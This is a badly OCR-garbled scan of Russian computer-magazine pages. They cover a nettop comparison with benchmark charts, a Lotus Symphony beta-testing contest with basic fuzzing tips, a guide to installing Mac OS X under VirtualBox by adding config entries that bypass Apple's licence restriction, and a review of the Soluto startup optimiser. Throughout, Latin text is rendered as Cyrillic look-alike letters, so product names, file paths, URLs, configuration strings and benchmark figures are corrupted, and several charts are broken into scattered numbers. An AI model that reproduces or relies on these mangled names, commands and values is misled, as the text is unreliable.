ПЛАТФОРМА: МѴІВІА ЮМ 
ПРОЦЕССОР: ІМТЕЕ АТОМ 330, 1 ,6 ГГЦ 
ОЗУ:2ГБООР2 

НАКОПИТЕЛЬ: НОВ 1 60 ГБ (5400 ОБ./МИН), КАРД-РИДЕР (50/5ВНС/ 
ММС/Х0/М5/М5РР0) 

ГРАФИКА: МѴЮІА ЮМ (ОЕЕОРСЕ 9400) 

ЗВУК:РЕАЕТЕКНіеН ВЕЕІМІТІОМ АОВІО 7.1 

СЕТЬ: МѴЮІА МЕОРСЕ 10/1 00/1 000 МБИТ/С, ѴѴІ-ЕІ 802. 11В/0/М 

РАЗЪЕМЫ: 6Х 05В 2.0, Р345, ѴОА (0-50В), НОМІ, Е5АТА,5/Р0ІЕ 

КОМПЛЕКТАЦИЯ: ПОДСТАВКА, СИСТЕМА КРЕПЛЕНИЯ МОНИТОРУ, 

АДАПТЕР ПИТАНИЯ 

РАЗМЕРЫ, ММ: 186X189X38 



+ 

Основное достоинство этого неттопа — его маленькие габариты; это са- 
мый миниатюрный девайс в обзоре. Установлена на нем операционная 
система ѴѴіпбоѵѵзХР Ноте — классика, с которой работало большинство 
пользователей, так что привыкатьни кчему новому и переучиваться тебе 
не придется. 

Для большинства классическихзадач, таких как веб-серфинг, про- 
слушивание музыки, работа с офисными приложениями итакдалее, 
его производительности вполне хватит. В отличие от некоторых более 
габаритных собратьев в нем установлен адаптер беспроводной связи, 
что является большим плюсом этой модели. 

Недостатки Ѵіе\л/5опісѴ0Т1 20 РС Міпі являются следствием его миниа- 
тюрных габаритов. Во-первых, это невысокая производительность, 
которой не хватит даже для воспроизведения НВ-видео, не говоря уже о 
современных играх. Во-вторых, это всего четыре порта ЕІ5В, из которых 
после подключения таких необходимыхустройств, как клавиатура и 
мышь, останутся свободными только два. 



■■■■■■■□□□ 

+ 

Если тебе не нравится однообразная обстановка на рабочем столе и 
ты любишь ее регулярно менять, то 20ТАС МАО МАОНВ-МО01-П — это 
устройство для тебя. Он обладаетажтремя вариантами установки: 
вертикальным или горизонтальным на подставке, а также с помощью 
ѴЕ5А-приспособлений на обратную сторону монитора. Вообще, это, ко- 
нечно, топовая модель, что прослеживается какв ее внешнем виде, таки 
в функционале, который включает в себя массу интерфейсов и встроен- 
ный адаптер беспроводной связи. 

Несмотря на все плюсы у этого устройства отсутствует порт ВѴІ, а также 
оптический привод, с котороготакудобно устанавливать операционную 
систему — ее, кстати, у да иного неттопа также нет. С одной стороны, у 
тебя будет выбор, а с другой — это все-таки минус. Дизайн устройства 
весьма спорный, понравится он явно не всем. 
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► 021 







РЕРким 



8иРЕКР1М001.51М РСМАКК’05 



ШАСМА6 

Ѵіеѵѵ8опісѴ0Т120 

А8Роск10М330-В0 

А8и8ЕееВОХ1012 

АСЕРА$ріге Р3600 

300ООІ0М-В23ѴѴ7Р 



□ 92.589 



□107.342 



40 60 



І 92.563 
1 92.761 
1 92.76 
192.754 
100 120 



Неттоп ѴіеѵѵБопіс снова отличился не лучшим образом 



20ТАСМА6 

Ѵіеѵѵ8опісѴ0Т120 

А8Воск10М330-В0 

А808ЕееВОХ1012 

АСЕРАзрігеВЗбОО 

ЗООооІОМ-В23ѴѴ7Р 




тагкз 



Команда А: неттопы отАБУБ, Асеги АБРоскв лидерах 



РАР СКѴ 2 



20ТАС МАО 
Ѵіеѵѵ8опісѴ0Т120 



14.8 



7.69 



А8Роск10М 330-В0 
А808ЕееВОХ1012 
АСЕРАзріге Р3600 
30 0ООІ0М-В23ѴѴ7Р 



4.35 



о 2 4 

1р5 



18.27 

8.23 



10 



12 



Современные игры неттопы, конечно, не тянут — в лучшем 
случае можно рассчитывать на 10 ^рз 



ЗОМАРК 

20ТАС МА6 

Ѵіеѵѵ8опісѴ0Т120 

АЗКоскІОМЗЗО^ВО 

А8иЗЕееВОХ1012 

АСЕВАзріге В3600 

ЗаОооІОМ-В23ѴѴ7Р 

- ЗОМагкОЗ 



ІІ165 



□954 



ІІ588 



■ 1419 



ІІ411 



ІІ115 



□3450 



□ 4204 



□ 4017 
^4122 



:3442 



о 500 1000 1500 2000 2500 3000 3500 4000 4500 
ЗОМагкОб шагкз 



Лидеры сохранили свои позиции, а вот на устройстве 
ѴіеѵѵБопіс тест не пошел 



ОЕЕКВЕМСН 2.1 



20ТАС МАО 

Ѵіеѵѵ8опісѴ0Т120 

А8Роск10М330-В0 

А808ЕееВОХ1012 

АСЕРАзріге Р3600 

300ООІ0М-В23ѴѴ7Р 




1544 



1600 



тагкз 



В этом тесте снова лидирует команда А. Аутсайдеры традиционно те же 



1800 



ВЫВОДЫ 

Награду «Выбор редакции» сегодня заполучает АЗВоск ЮМ 330- 
ВО, который обладает не только высокой производительностью, 



но и оптическим приводом Віи-Вау. «Лучшей покупкой» стано- 
вится А5Н5 ЕееВох РС ЕВ1012, который недорого стоит, доста- 
точно шустро работает и комплектуется пультом дистанционного 
управления 



► 022 
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Х-1е$(іпд сопіезі 



О Журнал Хакер представляет конкурс по поиску багов в бета-версии 
ІВМ Іоіиз Зутрііопу 3. Покажи себя в деле — и выиграй поездку в США 
на конференцию Іоіизрііеге с 17 по 21 января 2011 года! 




Все, что нужно для участия в конкурсе — установить 
1о1и$ Зутрііопу Веіа 3 и зарегистрироваться на сайте 
Іо^из.хакер.ги . Дальше все зависит от тебя: чем больше 
и интересней ошибки ты найдешь, тем больше у тебя 
шансы выиграть крутые призы! 






Стань бета-тестером 

Іо(и$ Зушрііопу 



Воровать софт — плохо. Но и покупать полноценные 
лицензии с зашкаливающими ценниками многим банально не 
под силу. Единственной возможностью избежать затрат и не 
потерять при этом в с|эункциональности становятся ^гееѵѵаге и 
орепзоигсе приложения, в том числе ос|эисный пакет от компа- 
нии ІВМ — Еоіиз 8утрІіопу. Развитие таких программ напрямую 
зависит от активного участия комьюнити. Сейчас у тебя есть не 
только возможность попользоваться удобным приложением, но и 



реальный шанс сделать его лучше, отыскав ошибки и получив 
за это отличный приз. 

Если верить статистике: 80% пользователей используют 
не более 20% с|эункционала пакета Місгозо^І О^Лсе. При этом, 
что вполне понятно, стоимость лицензии на пакет меньше 
не становится. Компания ІВМ, обладая штатом в 400 тыс. сотруд- 
ников во всем мире, внимательно проанализировала эти цифры. 
Так появилась Еоіиз Зутрііопу. 



Внеси свой вклад 



Любой программный продукт нуждается в 
серьезном бета-тестинге. Некоторые ком- 
пании предпочитают обходиться исключи- 
тельно собственными силами. Другие, и 
это в основном разработчики бесплатного 
и открытого ПО, активно привлекают 
бета-тестеров из компьюнити. Еще бы: 
даже самый большой отдел тестеров не 
может сравниться с той армией пользо- 
вателей, которые будут испытывать про- 
дукт в самых разных ситуациях. По этой 
причине к нам обратились ребята из ІВМ, 
которые очень просили, чтобы именно ты, 
наш читатель, попробовал найти баги и 



ошибки в бета-версии Еоіиз ЗутрМопу. 

На вопрос: «А не испугаетесь и просить 
пощады не будете?», — мы получили 
твердое «нет». Разве ж не хороший 
повод утереть опытным программистам 
из самой ІВМ нос, продемонстрировав 
пару багов? Тем более, на кону поездка 
в Штаты, и у тебя есть реальный шанс 
победить. Короче говоря, самое время 
поковырять программу с пользой дела. А 
чтобы лучше получалось, мы поделимся 
с тобой парой секретов о том, как лучше 
всего искать ошибки в ПО. 

Конечно, если продукт сырой, то различ- 
ные баги будут вылезать 
в самых 



разных местах, даже если не прилагать 
к этому никаких усилий. Подставил где- 
нибудь хитрое значение — программа 
вылетела, вот тебе и промах разработ- 
чиков. Еоіиз ЗутрМопу — не из таких, 
поэтому для поиска ошибок придется 
постараться. Естественно, вручную тести- 
ровать то, как приложение обрабатывает 
те или иные ситуации и входящие данные 
— задача неблагодарная. Ее легко можно 
автоматизировать. 

Первый путь — искать баги с помощью 
так называемого фаззинга. Это самый 
простой способ поиска ошибок. Смысл 
в том, чтобы передавать в различных 
местах программы намеренно некоррект- 
ные значения (очень длинные строки, спе- 
циальные символы и т.п.) и анализи- 
ровать то, как программа на 
это реагирует. 



История офисных 
продуктов Ыи$ 



□ 



1982: 



1983: 



1984: 




198Х: 




1995: 



История Зутрііопу 
начинается 
в далеком прошлом, 
когда компания Еоіиз 
□еѵеіортепі Согрогаііоп 
под руководством 
Митча Кэпора и 
Джонатана Сэкса выпу- 
стила свою первую 
программу для работы 
с электронными табли- 
цами. 



Через год корпорация 
анонсировала решение 
Еоіиз 1 -2-3, в котором 
работа с таблицей и гра- 
фиками впервые была 
объединена в функцио- 
нале одного решения. 
Именно тогда появилась 
верхняя панель для 
управления текстом, 
которая сейчас есть в 
любом офисном пакете. 



Первая версия Іоіиз 
Зутрііопу включала 
функционал для работы 
с графикой, таблицами 
и текстом в одном инте- 
грированном пакете. 
Она стоила $695 и 
занимала 12 флоппи- 
дисков емкостью 360 
Кб. 



80-е были временем 
первых и самых смелых 
разработок программ 
для работы с докумен- 
тами и таблицами. Еоіиз 
□еѵеіортепі Согрогаііоп 
была одним из самых 
активных участников про- 
цесса. Компания посто- 
янно выпускала новые 
версии программы для 
операционных платформ 
разных вендоров. 



Корпорация ІВМ поку- 
пает Еоіиз Оеѵеіортепі 
Согрогаііоп за кру- 
глую сумму — $3,5 
млрд. В этом же году 
появляется продукт 
Еоіиз ЗтагіЗиіІе 3.1, 
объединивший в инте- 
грированной панели 
таблицу, документ и 
презентацию. В течение 
следующих лет выходят 
различные его версии. 








Іоіиз. 8утр[іопу» Веіа 3 



Полезные аддоны 



Одна из прикольных фишек 

Іоіиз ЗутрИопу — это под- 
ключаемые плагины, с помо- 



® РІр $егѵег ріид-іп 

Добавляет в ЗуппрИопу встроенный РТР-клиент, позволяющий быстро 
коннектиться к РТР-серверу и работать с файлами (в том числе НТМІ) 
на удаленном хосте. 



щью которых можно легко 
добавить в приложение новый 
функционал. Любые аддоны 
можно скачать и установить 
прямо из самой программы. 
Некоторые из них — настоя- 
щий «Мизі ііаѵе!» 



@ Іойіз ЗутрИопу СНаіІЗИаге 

Аддон, предоставляющий возможность быстро расшарить презентацию 
другим людям. Для просмотра человеку потребуется лишь браузер, в 
котором он откроет присланный тобой II ВІ. 

@ ІВМ Іойіз ЗутрНопу рІид-іп 

Полезный плагин для удобного сравнения двух документов, выделяю- 
щий изменения разными цветами в очень наглядном виде. 

® ОаІаЬазе Соппесііоп РІид-іп 

Очень прикольный аддон, позволяющий реализовать реалтаймовую 
синхронизацию данных между электронной таблицей в Іоіиз 8утрПопу 
и таблицей в удаленной базе данных (например, 8ц1 8егѵег'е). 



Если разработчик не позаботился о пра- 
вильной обработке таких ситуаций, легко 
выявляется баг. Для начала можно вос- 
пользоваться следующими инструментами 
для файлового фаззинга и посмотреть, как 
Еоіиз 8утрІіопу обрабатывает некоррект- 
ные, испорченные файлы документов. С 
помощью утилиты Міпі^игг легко реализу- 
ется глупый фаззинг. Последнее означает, 
что тулза не знает, что именно она делает 
с файлом, а просто меняет некоторые 
данные внутри и открывает его в иссле- 
дуемой программе. Если четко описать 
формат и изменять значения внутри этого 
формата со знанием дела (например, 
только поля, которые отвечают за размер 
блоков или смещения), то фаззинг можно 
проводить намного более эффективно. 
Отличной платформой для реали- 



□ 
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199Х: 






2007: 



зации умного фаззинга является РеасМ 
Риггег (реасіі^иггег.сопп). Второй путь — 
воспользоваться утилитами из разряда 
СарШге-РІауЬаск, которые записывают 
действия тестировщика во время ручного 
тестирования. Ты можешь один раз запи- 
сать последовательность действий и легко 
воспроизводить ее вновь и вновь, под- 
ставляя в нужных местах различные пара- 
метры. Таким образом, тупое повторение 
одних и тех же действий можно заменить 
умным скриптом. Для создания таких 
макросов тебе пригодятся утилита Аиіоіі, 
позволяющая писать самые сложные сце- 
нарии, а также инструмент 8ікиІі 
Последний явля- 
ется 



□ 



одной из самых простых программ для 
создания макросов, автоматизирующих 
что угодно в системе с помощью скриптов 
на ^у^I^оп и графической среды для визу- 
ального создания макросов. 

Конечно, все эти средства — лишь отправ- 
ная точка, с которой можно начать свое 
маленькое бета-тестирование. Выиграть 
конкурс сможет тот, кому удастся четко 
определить места, где потенциально могут 
быть ошибки, а также найти или создать 
самому инструменты, позволяющие их 
выявить. Интересная задачка, даже очень. 



2008: 




2010: 




2011: 



Большим шагом вперед 
стал выход расширенного 
до 5 программ пакета 
Еоіиз 8тагі8иі1е. Однако 
во время перехода на 
32-битную архитектуру 
Еоіиз 8тагі8иі1е не успе- 
вает вовремя модернизи- 
ровать свои программы 
и в итоге теряет свою 
долю на рынке. Это был 
серьезный ^аіі для Еоіиз и 
шанс для Місгозо^І О^Лсе. 



Новая история Еоіиз 
8утрІіопу началась три 
года назад, когда на 
главной странице ІВМ 
появился первый релиз 
бесплатного офисного 
пакета для работы с 
документами, таблица- 
ми и презентациями. 
Тот же функционал, 
что и Місгозо^І О^Лсе, 
но бесплатно! 



В планах ІВМ - пере- 
вести всех сотрудников 
на использование 
Еоіиз ВутрМопу. Вышла 
обновленная версия 
Еоіиз 8утрІіопу с 60 
новыми инструментами. 
Решение поддерживает 
все основные форматы 
документов, электрон- 
ных таблиц и презен- 
таций. 



Новая версия под 
названием Ѵіеппа 
несет в себе большое 
количество нововве- 
дений, в том числе 
поддержку некоторых 
макросов, которые не 
были доступны ранее. 
Выходит большое 
количество дополни- 
тельных плагинов и 
готовых макросов. 



Новая версия 
ВутрМопу (Атзіегсіапп) 
должна выйти в 
201 1 г. В ближайшие 
несколько месяцев 
у тебя есть возмож- 
ность сделать так, 
чтобы она стала еще 
более удобной и 
функциональной. 

И реальный шанс 
получить в благодар- 
ность поезду в Штаты. 










МАС08 X + 

ѵіртимвох = 

ЛЮБОВЬ 

Запускаем макось под виртуальной 
машиной 

Единственно верный способ почувствовать прелесть Мае 08 X - купить компью- 
тер или ноутбук Мае. Удобно, быстро, стабильно и без геморроя - человеческий 
подход в лучших традициях Мае. Желая познать непознаваемое, а именно - 
Мае 08 X на обычном РС, знтузиасты активно допиливают различные виды Ха- 
кинтоша, ругаются словами «кекст» и боятся апдейтов системы. Еще сложнее 
было заставить макось работать под виртуальной машиной, но зто только до 
сегодняшнего дня. 



ЭКСПЕРИМЕНТАЛЬНАЯ ПОДДЕРЖКА 

Все началось с того, что я решил попробовать написать приложе- 
ние для іРЬопе/іРасІ и тут же встрял из-за досадного ограничения. 
Оказалось, 50К разработчика и все сопутствующие инструменты 
доступны только для платформы Мае 05 X. По правде говоря. Мае 
я собираюсь купить уже довольно давно, особенно после мучитель- 
ных танцев с Хакинтошом, но, увы, заветный МасЬоок Рго 15" 
как был, так и остается лишь пунктом в списке «Хочу купить». 
Колдовать снова с установкой Мае 05 на свой РС, не имея гаран- 



тии, что смогу хотя бы запустить нужный софт, не было никакого 
желания. Опыт подсказывал, что ничего хорошего не выйдет и с 
виртуальными машинами. Ни одно решение для виртуализации, 
будь оно от МІСГ 050 І 1 :, РагаКеІз, ѴМѵѵаге или 5ип, без шаманства 
(важный момент!) не позволяет запустить Мае 05 в качестве госте- 
вой ОС! Вернее говоря, не позволяло. Изучая сЬапдеІод программы 
ѴігІиаІВох'а (теперь уже распространяемое под эгидой компании) 
Огасіе, которую в последнее время использую в качестве основного 
средства виртуализации, наткнулся на очень интересную строчку: 
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Мае 05 Хр запущенная под ѴігІиаІВох 



«Ехрегітепіаі зиррогі: Ьг Мае 05 X Зегѵег диезіз». Опция впервые 
появилась в версии 3.2.0 и далее часто упоминается. Получается, 
в качестве гостевой 05 теперь можно установить макось? Олово 
«зегѵег» сначала сбило с толку, но быстро выяснилось, что это есть 
не что иное, как лицензионное ограничение Мае 05 X. Дело в том, 
что лицензия допускает установку 00 только на компьютеры и ноут- 
буки Мае. Все остальное, включая Хакинтоши и прочие извраще- 
ния, по большому счету запрещены — вполне логичный шаг со сто- 
роны компании Арріе. А вот ограничение внутри самой ѴігІиаІВох, 
как оказалось, искусственное. Быстро нашлось немало отзывов о 
том, что под ѴігІиаІВох'ом отлично устанавливается последняя вер- 
сия Мае 05 X, то есть 5поѵѵ Беорагб (такое вот кодовое имя релиза). 
Тут надо иметь в виду, что подобный опыт напрямую нарушает 
лицензию системы, поэтому может рассматриваться исключитель- 
но в образовательных целях. 

СОЗДАНИЕ ВИРТУАЛЬНОЙ МАШИНЫ 

Главное требование для установки Мае 05 X — поддержка про- 
цессором спецификации ѴТ-х. ІпТеІ ѴІгТиаНгаГоп ТесЬпоІоду Ьг 
х86 поддерживается практически всеми современными процессо- 
рами ІпТеІ, включая большинство Ооге 2 Вио/Оиаб и модных І3/і5/ 

І7. Мы проводили эксперимент на Ооге 2 Вио Е8500 и ѴѴіпбоѵѵз 7 
в качестве основной системы. Во многих случаях система должна 
завестись и на процессоре от АМО, но только при условии, что 
тот имеет поддержку технологии виртуализации АМѴ-Ѵ. Далее 
потребуется официальный диск с Мае 05 X или его образ (у нас 
была версия 10.6.3), конечно же, легально купленный (это тебе 
не ѴѴіпбоѵѵз!). Если образ сграблен под Мае 05 и имеет раз- 
решение .бтд, то привести его в привычный 150-вид поможет 
утилита сітд2ітд ( ѵиииг.еи.огдЛооІз ): сЗтдЗітд зоигсе_Еі1е. 

(±пд (іезСіпаСіоп_бі1е . ізо. Далее необходимо создать «пра- 



вильную» виртуальную машину, на которую и будет установлена 
система. Ообственно, начать нужно с того, что указать тип гостевой 
системы — «Мае 05 X 5егѵег». Что приятно, такой тип выбирается 
автоматически — стоит только в названии виртуалки использовать 
слова «тас» или, скажем, «Іеорагб». Крайне желательно выде- 
лить виртуальной машине минимум 1024 Мб оперативки и создать 
виртуальный жесткий диск на 20 Гб (вполне можно использовать 
опцию «Оупатісаиу ехрапбіпд зіогаде»). После создания виртуал- 
ки не лишним будет открыть ее свойства и, во-первых, отключить 
эмуляцию Корру-диска, а во-вторых, установить количество видео- 
памяти, равное 128 Мб. В качестве ЮЕ-контроллера должен быть 
выставлен тип ІСН6, но это работает и по умолчанию. 
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Вносим важные параметры в ХМЬ-конфиг 
виртуалки 



Далее есть два пути. Первый и самый правильный — обойтись 
силами одной только ѴігІиаІВох. Для этого необходимо закрыть 
программу (крайне важно, иначе ничего не получится!) и найти 
ХМІ-конфиг только что созданной виртуалки. В ХР он находится 
здесь: С : \ВоситепСз апсі ЗеССіпдз\<изегпате>\ . ѴігСиаІВох\ 
МасЬ.іпез\<пате об СЬе ѴМ>\<пате об бЬ.е ѴМ>.хт1, в ѴІ5Іа/ 
ѴѴіпсіоѵѵз 7 С: \изегз\<изегпате>\ . ѴігбиаІВох\МасЬ.іпез\<пате 
об бЬ.е ѴМ>\<пате об бЬ.е ѴМ>.хт1. Под Ьіпих'ом ищи ХМП 
внутри /Ноте. В этом файле есть несколько строк, описывающих так 
называемые ЕхІгаВаІаИепп. Найди это место поиском в любом тексто- 
вом редакторе и добавь еще две строчки: 

<ЕхбгаВабаІбет пате= " ѴВохІпбегпа12 /ЕбіВообАгдз " 

ѵа1ие=" "/> 

<ЕхбгаВабаІбет пате= " ѴВохІпбегпа12 /ЗтсВеѵісеКеу " 

ѵа1ие= " оигІіагсіѵ^огкЬубІіезеѵ^огсіздиагсіесірІеазесіопбзбеаІ 

(с) АррІеСотрибегІпс " /> 

После этого можно сохранить конфиг и заново запускать ѴігІиаІВох. 
Последний штрих — выбрать в качестве сбготе образ с Мае 05 X 
и стартовать виртуальную машину. В 90% случаев запустится гра- 
фический инсталлятор, и можно будет спокойно установить ось. 
Откуда берутся эти 10% неудач, сказать сложно. Однако если вдруг 
во время загрузки выплывает какая-нибудь кегпеі-ошибка, или 
многообещающе появится серый экран с курсором, но на этом все 
и останавливается, можно попробовать другой путь. В этом случае 
уже не надо никак шаманить с конфигом виртуалки (если доба- 
вил туда ЕхІгаВаІаІІепп'ы, то их надо удалить). Идея в том, чтобы 
использовать альтернативный загрузчик — Етріге ЕРІ ( ргазѵз.со.сс/ 
Іаа/етріге-еб ). Штука распространяется в виде 150-файла (напри- 
мер, етрігеЕЕІѵІ ОВб.ізо), которую надо примонтировать к виртуалке 
и отдать команду на старт. Во время загрузки появится уже темный 
интерфейс Етріге ЕЕІ — в этот момент надо демонтировать текущий 
образ альтернативного загрузчика и подключить 150'шку со 5поѵѵ 
Ееорагб. Обновляем информацию о диске (<Е5>), жмем <Еп1:ег> — 
вуаля, опять же получаем окно установщика Мае 05 X. 

УСТАНОВКА И НАСТРОЙКА 

Тем или иным способом появляется графический интерфейс уста- 
новщика системы, который приветливо предлагает выбрать язык 
для установки. Далее, спросив, куда необходимо установить 00, он 
почему-то не предложит никаких вариантов. Все потому, что еще 
не размечен жесткий диск (виртуальный). Для того, чтобы создать 
структуры и отформатировать разделы, запускаем дисковую ути- 
литу из раздела «Утилиты» верхнего меню. Тут выбираем вкладку 
«Отереть», потом жмем кнопку «стереть», и утилита сама все сде- 
лает за нас. Теперь указываем установщику размеченный раздел 
— и начинается процедуры установки. ВеЬооЕ 

Полностью рабочая система с достойным разрешением, поддержкой 
клавиатуры/мыши, а также сетевого адаптера — вот, что тебя ждет 
сразу после перезагрузки компьютера. Единственное — придется 



пройти процедуру идентификации клавиатуры (мастер потребует 
нажать на клавиши рядом с <5бТі:>’ами), а также создать учетную 
запись пользователя. Тут надо помнить, что раскладка клавиатуры 
переключается комбинацией <\л/іпкеу>+<пробел>. От всех процедур 
регистрации и создания учетки в сервисе МоЬіІеМе можно смело 
отказаться, как и от процедуры переноса данных с другого компью- 
тера Мае (ведь как заботливо, а!?). Далее, когда со всеми этими 
вопросами от нас отстанут, можно, наконец, пощупать саму систему. 
Щелкаем по окошкам, запускаем различные программы, пробуем 
открыть страницы в браузере 5аІагі. Тут же скачиваем Техітаіе, 
легендарный текстовый редактор для Мае 05 X, в виде непривычно- 
го бтд-файла (формат дистрибутивов в Мае 05 X) и устанавливаем 
— опять же, все отлично работает. Конечно, совсем не так шустро, 
как на самом Мас'е, и не так быстро, как в случае Хакинтоша, но 
при этом вполне комфортно. В эйфории оттого, что не надо мучить- 
ся с кекстами и прочими шаманствами, можно даже не заметить 
отсутствие звука — в системе нет драйвера для звукового контрол- 
лера ЮН АС97, который эмулирует ѴігШаІВох. Вероятно, этот факт 
сильно напрягал энтузиастов, поэтому на форуме виртуалки быстро 
появились необходимые дрова. Добротный установщик, доступный 
на Югит5.ѵіг1:иа[Ьох.ога/ѵіе\л/І:оріс.рбр?Ю4&І:=30843 . избавит даже от 
возни с ручной правкой кехЕов. Просто скачай РКб-файл, запусти 
его и перезапусти систему. Помимо отсутствия звука меня напряга- 
ло фиксированное разрешение, установленное в гостевой ОС, рав- 
ное 1024x768. К счастью, и для этого есть маленький хинт, который 
опять же необходимо провернуть в конфиге виртуалки. Открываем 
ХМЕ-файл в текстовом редакторе и после всех ЕхШаОаІаКет добав- 
ляем новую строку: 

<ЕхЦгаВаСаІЦет пате= " ѴВохІпСегпа12 /ЕПіСорМосіе " 

ѵа1ие= "Е" /> 

Параметр N — это числа от О до 4, означающие разрешения 
640x480, 800x600, 1024x768, 1280x1024, 1440x900 соответственно. 

0 помощью этой строки мы указываем, что виртуальная машина 
должна использовать так называемый ѴігШаІВох ЕЕІ. ЕЕІ — это 
ЕхІепзіЫе Еігтѵѵаге Іпіегіасе, новый индустриальный стандарт, 
который должен заменить БИОС в качестве основного интерфейса. 
Увы, в рамках используемого виртуальной машиной ЕЕІ другие раз- 
решения не поддерживаются, но даже 1440x900 вполне достаточно 
для комфортной работы. Вот чего пока не хватает, так это под- 
держки надстройки Оиезі: АббШопз, с помощью которой, напри- 
мер, можно очень просто обмениваться файлами между хостовой 
и гостевой машиной. Сейчас для этого придется использовать 
протокол 5МВ. Для этого сначала нужно его включить. Переходим 
в настройки: «Меню Системные настройки Интернет и бес- 
проводная сеть Сбщий доступ» и включаем «Сбщий доступ 
к файлам». В «параметрах» необходимо активировать протокол 
5МВ. Теперь к любой ѴѴіпбоѵѵз-машине с расшаренными ресур- 
сами можно подключиться через меню «Переход Подключение 
к серверу». Надо лишь указать адрес хоста в адресной строке: 
зтЬ://1 0.О.2.2. Кстати говоря, значение 10.0.2.2 неслучайно: в боль- 
шинстве случаев (то есть с сетевыми настройками ѴВ и виртуаль- 
ной машины по умолчанию) это будет адрес хостовой машины. 

КУПИТЬ МАС 

Сама по себе поддержка Мае С5 X в качестве гостевой СС — это 
очередной шаг вперед ребят из команды ѴігТиаІВох. Многие из 
них живут и работают в Питере и еще пару лет назад с радостью 
показывали мне только что введенную поддержку ЗВ-ускорения 
внутри гостевых систем. Потом появился ЕазЬ-клиент для доступа 
к виртуальным машинам. Теперь — новая фича, и опять «полный 
улет». С другой стороны, как бы просто ни было поставить макось 
под виртуалкой, это никогда не заменит настоящего Мас'а: быстро- 
го компьютера или ноутбука с прекрасным экраном, чумовым тач- 
падом и долгой батареей. Помни об этом. -и- 
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Все приложения автозагрузки разделяются на понятные группы 



Возможность расширить функциональность 
за счет плагинов — это всегда большой плюс 
приложения. Некоторые из подключаемых рас- 
ширений набирают такую популярность, что со 
временем входят в состав оригинального при- 
ложения. Пример банальной рассудительности 
со стороны разработчиков: если кто-то уже 
реализовал классную фичу, которая многим по 
душе, и сделали это хорошо, то чего же отка- 
зываться? Надо сделать ее доступной всем по 
умолчанию, и это будет правильно. Такой под- 
ход почему-то никак не приживется у Місговоі"!:. 
Удивительно, как компания умудряется вбу- 
хивать огромные бабки в разработку многих 
инновационных функций, часть из которых 
мы так и не увидели (взять хотя бы волшеб- 
ную файловую систему ѴѴіпРЗ), но не может 
включить в состав своей эпохальной системы 
несколько утилит, которые, что совершенно 
очевидно, должны в ней быть. Я искренне 
радовался за ребят, когда год назад поставил 
себе ѴѴіпбоѵѵз 7 — систему действительно 
удобную и приятную, которая шустро работала 
и быстро грузилась. Увы, сейчас она грузится 
уже далеко не так быстро. Как бы я ни старался 
устанавливать только минимум проверенного 
софта (все эксперименты я провожу только под 
виртуалкой), винда все равно обросла различ- 
ными приложениями, сервисами, драйверами, 
часть из которых вообще установилась втихаря 
вместе с другими программами. Нет, это ни в 
коем случае не вина МісгозоІІ: не может же 
компания отдуваться за все те хреново напи- 



санные программы, которые в огромных коли- 
чествах пользователь ставит в систему. Но! 
Объясните мне, почему в винде нет простого 
и понятного инструмента, который помог бы 
привести систему в чувство? Разве же сложно 
включить в состав утилиту, которая позволяла 
бы навести порядок в той мусорной яме, назы- 
ваемой «автозагрузка»? Это при том колос- 
сальном количестве мест, которое разработчи- 
ки системы заботливо предусмотрели для того, 
чтобы прописать приложение или библиотеку 
в автозагрузку (и чем непременно пользуются 
не только малварь, но и самые обычные при- 
ложения). Да, есть тзсопбд — но многие ли 
пользователи знают, как им пользоваться? 

Да какой там — как его вообще запустить? 

Или почему не включить в систему утилиту 
АиЬгипз от Эузіпіегпаіз? Понимаю возможную 
опасность: проги больше подходят продви- 
нутым пользователям, которые не побоятся 
удалить лишнего. Но что мешает сделать ана- 
логичный продукт, с подсказками и понятным 
изегігіепбіу интерфейсом? Религия? Нам же 
остается полагаться на другие решения, такие 
какБоІиІо ( ѵѵѵѵѵѵ.зоіиіо.сопп ]. Обязательно уста- 
нови его. При первом же ребуте компьютера 
в левом нижнем углу ты заметишь небольшую 
панельку, в которой будет отображаться общий 
таймер загрузки системы, а также названия 
программ и сервисов, который в данный 
момент подгружаются. Мое время загрузки 
ужаснуло — 2 минуты 23 секунды. Собственно, 
первая функция программы — это своеобраз- 



ный бенчмарк, который замеряет, сколько вре- 
мени уходит на запуск каждого из элементов 
автозагрузки. Наконец-то можно разобраться, 
что конкретно тормозит и увеличивает время 
загрузки винды. Чтобы ситуацию можно было 
разрулить, все элементы удобно разбиты на 
группы «Мо-Ьгаіпег», «РоІепбаНу геЬооІ:», 
«Рериігеб». Первая группа — самая лакомая. В 
нее входят те процессы, автозагрузки которых 
практически без опаски можно удалить. Для 
каждого компонента ЭоІиЬ выводит неболь- 
шое описание, где понятным языком объ- 
ясняется, за что он отвечает. Но самый смак 
— в рекомендациях. Я, например, понятия не 
имел, за что отвечает служба «ѴѴМР ЭЬагіпд». 
Утилита же на простом английском языке 
объяснила, что служба предназначена для 
трансляции потокового видео в Сеть. «Если вы 
не планируете организовывать трансляции в 
Сеть, автозагрузку сервиса можно отключить 
или отложить» — вполне понятная рекоменда- 
ция. Стложенный запуск, упомянутый в реко- 
мендации — это еще одна фича, позволяющая 
реализовать запуск приложения не на старте 
системы, а во время ее простоя. Таким обра- 
зом, можно добиться очень быстрого старта 
самой винды, при этом все дополнительные 
примочки будут запускаться позже. Вторая 
группа — «РоІепбаЕу геЬооІ:» — включает 
элементы, которые потенциально можно опти- 
мизировать. По крайней мере, они не входят 
в третью группу («Ведиігеб») обязательных 
компонентов, которые непременно должны 
грузиться на старте системы. Информация о 
принадлежности компонентов к той или иной 
группе подгружается из онлайн базы данных, 
в которой аккумулируются данные от различ- 
ных пользователей. Благодаря такому облаку 
разработчики ЭоІиЬ могут составлять и кор- 
ректировать свои рекомендации. Насколько 
это эффективно? За пару минут я довел время 
загрузки системы до 51 секунды. Вот. ^ 




Время загрузки после оптмизиации 
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Посторонись, пресловутый РНР! Долой ^аѵа! Старичок Регі, тебе так вообще 
давно пора на пенсию. И как же вы уже достали, попсовые КиЬу и РуІНоп! Все 
эти давно знакомые технологии уже не торкают. Зато сегодня мы посмотрим на 
чрезвычайно прогрессивный подход, когда для написания серверного кода ис- 
пользуется... ^аѵа8сгір(. 



Есть идея для стартапа. Теперь вопрос: на чем его писать? Конечно, 
есть всеми любимый РНР — что может быть легче для веб-сайта! 

Но скажи честно, как-то не тянет, правда? Ведь чтобы сделать что- 
то стоящее, голого РНР не хватит. Сразу придется прикручивать 
еще и А^АX, чтобы данные незаметно подгружались без обновления 
всей страницы целиком, да и это не решит всех проблем. О том, 
что РНР не так хорош, ты задумаешься в тот самый момент, когда 
к тебе разом ломанется много народа. А все потому что РНР (как и 
